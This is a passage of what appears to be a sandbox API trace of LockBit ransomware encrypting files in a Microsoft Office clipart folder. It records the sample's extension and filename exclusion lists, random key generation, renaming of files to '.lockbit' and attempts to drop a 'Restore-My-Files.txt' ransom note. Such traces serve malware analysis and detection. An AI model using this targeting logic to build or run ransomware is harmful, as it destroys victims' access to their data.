lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0172.119] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0172.119] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0172.119] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0172.119] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0172.119] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0172.119] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0172.119] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0172.119] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP.lockbit") returned 72 [0172.119] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02753u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0172.121] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.121] malloc (_Size=0x40068) returned 0x3df0008 [0172.121] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=108216) returned 1 [0172.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0172.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0172.122] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0172.178] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.179] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.179] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.180] free (_Block=0x1fa2ed8) [0172.180] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.180] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.180] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe48deb00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe48deb00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x1a7d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02754U.BMP", cAlternateFileName="")) returned 1 [0172.181] lstrcmpiW (lpString1=".", lpString2="PH02754U.BMP") returned -1 [0172.181] lstrcmpiW (lpString1="..", lpString2="PH02754U.BMP") returned -1 [0172.181] PathFindExtensionW (pszPath="PH02754U.BMP") returned=".BMP" [0172.181] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0172.181] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0172.181] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0172.181] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0172.181] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0172.182] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0172.182] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0172.182] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02754U.BMP") returned 1 [0172.183] lstrcmpiW (lpString1="ntldr", lpString2="PH02754U.BMP") returned -1 [0172.183] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02754U.BMP") returned -1 [0172.183] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02754U.BMP") returned -1 [0172.183] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02754U.BMP") returned -1 [0172.183] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02754U.BMP") returned 1 [0172.183] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02754U.BMP") returned -1 [0172.183] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.183] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP") returned=".BMP" [0172.183] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0172.183] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0172.183] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0172.184] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0172.184] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP.lockbit") returned 72 [0172.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02754u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0172.185] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.185] malloc (_Size=0x40068) returned 0x1ff1e60 [0172.185] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=108504) returned 1 [0172.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0172.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0172.187] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0172.271] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.271] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.271] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.273] free (_Block=0x1fa2ed8) [0172.273] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.273] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.273] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd50ea200, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd50ea200, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x1a7d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02755U.BMP", cAlternateFileName="")) returned 1 [0172.273] lstrcmpiW (lpString1=".", lpString2="PH02755U.BMP") returned -1 [0172.273] lstrcmpiW (lpString1="..", lpString2="PH02755U.BMP") returned -1 [0172.273] PathFindExtensionW (pszPath="PH02755U.BMP") returned=".BMP" [0172.273] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0172.273] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0172.273] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0172.273] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0172.273] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0172.273] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0172.273] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0172.274] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0172.274] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0172.274] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0172.275] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02755U.BMP") returned 1 [0172.275] lstrcmpiW (lpString1="ntldr", lpString2="PH02755U.BMP") returned -1 [0172.275] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02755U.BMP") returned -1 [0172.275] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02755U.BMP") returned -1 [0172.275] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02755U.BMP") returned -1 [0172.275] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02755U.BMP") returned 1 [0172.275] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02755U.BMP") returned -1 [0172.275] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.275] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP") returned=".BMP" [0172.276] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0172.276] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0172.276] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0172.277] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0172.277] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0172.277] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0172.277] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP.lockbit") returned 72 [0172.277] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02755u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0172.278] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.278] malloc (_Size=0x40068) returned 0x3df0008 [0172.278] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=108504) returned 1 [0172.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0172.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0172.279] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0172.383] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.383] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.383] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.432] free (_Block=0x1fa2ed8) [0172.432] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.432] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.432] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb853a00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcb853a00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x30408, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02756U.BMP", cAlternateFileName="")) returned 1 [0172.432] lstrcmpiW (lpString1=".", lpString2="PH02756U.BMP") returned -1 [0172.432] lstrcmpiW (lpString1="..", lpString2="PH02756U.BMP") returned -1 [0172.432] PathFindExtensionW (pszPath="PH02756U.BMP") returned=".BMP" [0172.433] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0172.433] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0172.433] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0172.433] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") 